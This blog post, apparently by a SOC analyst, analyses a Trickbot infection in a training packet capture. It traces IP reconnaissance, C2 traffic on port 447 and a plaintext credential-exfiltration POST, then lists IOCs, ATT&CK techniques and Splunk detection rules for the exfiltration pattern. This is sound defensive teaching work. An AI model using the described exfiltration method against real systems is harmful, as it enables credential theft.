Most malware investigations involve reconstructing what might have happened. This one was different.
By following a single HTTP stream in Wireshark, I read stolen credentials in plaintext — Google, Facebook, and Yahoo passwords transmitted to an attacker's server in real time. The entire exfiltration completed in 96 seconds.
Dataset: controlled training exercise from malware-traffic-analysis.net — used widely in the security community for analyst education.
Tools Used
- Wireshark 4.x — packet analysis, HTTP stream following
- VirusTotal — IP and domain reputation
- MITRE ATT&CK Navigator — TTP mapping
- Splunk SPL — detection rule development
Step 1 — Identifying the Victim
Filter: dhcp
| Field | Value |
|---|---|
| Hostname | DESKTOP-CANDLES |
| IP | 10.11.9.102 |
| MAC | 00:08:02:1c:47:ae |
| OS | Windows 10 build 19042 |
| Total packets | 2,502 — highest in capture |
Step 2 — Traffic Overview
Statistics → Conversations → TCP
| IP | Packets | Port | Red Flag |
|---|---|---|---|
| 167.86.123.83 | 1,484 | 447 | Non-standard port |
| 66.85.183.5 | 462 | 443 | Bare IP, no domain |
| 51.81.112.135 | — | 443 | HTTP (not TLS) on port 443 |
Step 3 — IP Reconnaissance (Packet 21)
GET / HTTP/1.1
Host: icanhazip.com
No user action triggers an IP-check service — only malware does this post-infection. Trickbot uses it to confirm internet connectivity and rule out sandboxes.
MITRE: T1016
Step 4 — C2 on Non-Standard Port 447
Filter: tcp.dstport == 447
Many firewalls only inspect port 443 for HTTPS. Port 447 bypasses those rules while still appearing encrypted.
MITRE: T1571
Step 5 — The Impossible User-Agent
Filter: http.user_agent
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0...)
IE7 on Windows 10 is technically impossible. IE7 was released in 2006 and was never made for Windows 10. This is a zero-false-positive detection signature — any log with MSIE 7.0 + Windows NT 10.0 is confirmed malware.
MITRE: T1036
Step 6 — The Credential Exfiltration
Filter: http.request.method == "POST"
At Packet 1592, 21:33:44 UTC:
POST /tar2/DESKTOP-CANDLES_W10019042.1C550D7482EBE49086FC1A7D2100C9E5/81/
Host: 51.81.112.135:443
Content-Length: 627
Right-click → Follow → HTTP Stream:
name="data"
[service URL]|[username]|[password] ← Google account 1
[service URL]|[username]|[password] ← Google account 2
[service URL]|[username]|[password] ← Google account 3
[service URL]|[username]|[password] ← Facebook account
name="source"
chrome passwords
Server: HTTP 200 OK — all data received.
Why HTTP on port 443?
Trickbot uses port 443 for plain HTTP (not TLS). Port 443 is trusted by monitoring tools as "HTTPS = safe." The POST body travels completely unencrypted while the port number hides it in plain sight.
MITRE: T1041 T1555.003
Step 7 — Decoding the Bot ID
/tar2/DESKTOP-CANDLES_W10019042.1C550D7482EBE49086FC1A7D2100C9E5/81/
│ │ │ │
Hostname OS Build Hardware fingerprint Module
81=passwords
83=form data
90=other data
This ID is unique per machine, persistent across reboots, and a high-confidence search term across all log sources.
Step 8 — Full Exfiltration Timeline
| Packet | Time (UTC) | Event | Bytes |
|---|---|---|---|
| #21 | 21:30:01 | GET icanhazip.com | minimal |
| #1592 | 21:33:44 | POST module 81 — passwords | 627 |
| #1599 | 21:33:44 | HTTP 200 OK ✓ | — |
| #1727 | 21:34:10 | POST module 90 | 120 |
| #1753 | 21:34:15 | POST module 83 — form data | 612 |
| #2109 | 21:34:47 | POST module 81 — repeat | 346 |
| #2138 | 21:35:20 | POST module 83 — repeat | 637 |
| #2141 | 21:35:20 | HTTP 200 OK ✓ final | — |
Total: 2,342 bytes · 5 POSTs · 5 × HTTP 200 OK · 96.3 seconds
IOC Table
| Type | Value | Role |
|---|---|---|
| IP | 66.85.183.5 | Primary C2 |
| IP | 167.86.123.83 | Secondary C2 — port 447 |
| IP | 51.81.112.135 | Exfiltration server |
| IP | 156.96.128.237 | Secondary exfiltration |
| URI | /tar2/[BOTID]/[MODULE]/ | Trickbot signature |
| Port | 447 outbound | C2 evasion |
| User-Agent | MSIE 7.0 + Windows NT 10.0 | Zero-FP malware signature |
MITRE ATT&CK Map
| ID | Technique |
|---|---|
| T1566 | Phishing |
| T1071.001 | Application Layer Protocol: Web Protocols |
| T1573.001 | Encrypted Channel |
| T1041 | Exfiltration Over C2 Channel |
| T1555.003 | Credentials from Web Browsers |
| T1082 | System Information Discovery |
| T1016 | System Network Configuration Discovery |
| T1571 | Non-Standard Port |
| T1036 | Masquerading |
Detection Rules (Splunk SPL)
Rule 1 — Trickbot URI pattern
index=network http.request.method=POST http.uri="/tar2/*"
| rex field=http.uri "/tar2/(?<bot_id>[^/]+)/(?<module_id>\d+)/"
| stats count by src_ip, dest_ip, bot_id, module_id
Rule 2 — Non-standard port outbound
index=network dest_port=447 OR dest_port=449 OR dest_port=8082
| stats count by src_ip, dest_ip, dest_port
| where count > 10
| sort -count
Rule 3 — Impossible User-Agent (zero false positives)
index=network http.user_agent="*MSIE 7.0*" http.user_agent="*Windows NT 10.0*"
| stats count by src_ip, dest_ip, http.user_agent
Rule 4 — Internal host calling IP-check service
index=network http.request.method=GET
(http.host="icanhazip.com" OR http.host="api.ipify.org"
OR http.host="checkip.amazonaws.com")
| stats count by src_ip, http.host
| where count > 2
Rule 5 — Large credential POST to external IP
index=network http.request.method=POST
| eval dest_internal=if(match(dest_ip,"^(10\.|192\.168\.)"),1,0)
| where dest_internal=0
| eval body_size=coalesce(http.content_length,0)
| where body_size > 200
| stats count, max(body_size) as max_body by src_ip, dest_ip, http.uri
| sort -max_body
Four Key Takeaways
Port 443 ≠ HTTPS. Always verify the actual protocol, not just the port. Deploy TLS inspection at your proxy.
96 seconds is not enough time for manual triage. Automated detection rules are the only viable defense against this speed.
The bot ID is your best forensic artifact. One string search across all logs = complete picture of the infection.
The impossible User-Agent is a gift. Zero false positives. Write the alert. Fire on any match, no exceptions.
Full Report on GitHub
👉 github.com/himanshumodi3108/cybersec-portfolio
This analysis was performed on a controlled training dataset from malware-traffic-analysis.net for educational purposes.
Himanshu Kumar Modi · Associate at PwC India · SOC Analyst in Training
LinkedIn · Cybersecurity Portfolio
Top comments (0)